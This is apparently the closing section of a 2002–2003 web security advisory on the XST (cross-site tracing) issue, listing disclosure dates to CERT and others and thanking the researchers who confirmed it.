Issue disclosed and confirmed by Tim Mullen
December 4, 2002.
Issue disclosed and confirmed by Ryan Russell
December 5, 2002.
Issue disclosed and confirmed by Steve Christey (Mitre)
December 6, 2002.
Issue disclosed and confirmed by Rain Forest Puppy (Wiretrip.net)
December 10, 2002.
Issue disclosed and confirmed by CERT.
January 20, 2003.
Issue publicly disclosed by WhiteHat.
Credits & Thanks
Robert Auger: For help with security research, vulnerability identification, and mirror help.
Rain Forest Puppy: For help with vulnerability confirmation, security resolutions research and the XST title.
Tim Mullen: For help with vulnerability confirmation and security resolutions
Steve Christey: For help with vulnerability confirmation and feedback
Ryan Russell: For help with vulnerability confirmation
Robert Rodger: For help with iPlanet vulnerability confirmation and remediation
Alastair Davie: For help with iPlanet vulnerability confirmation and remediation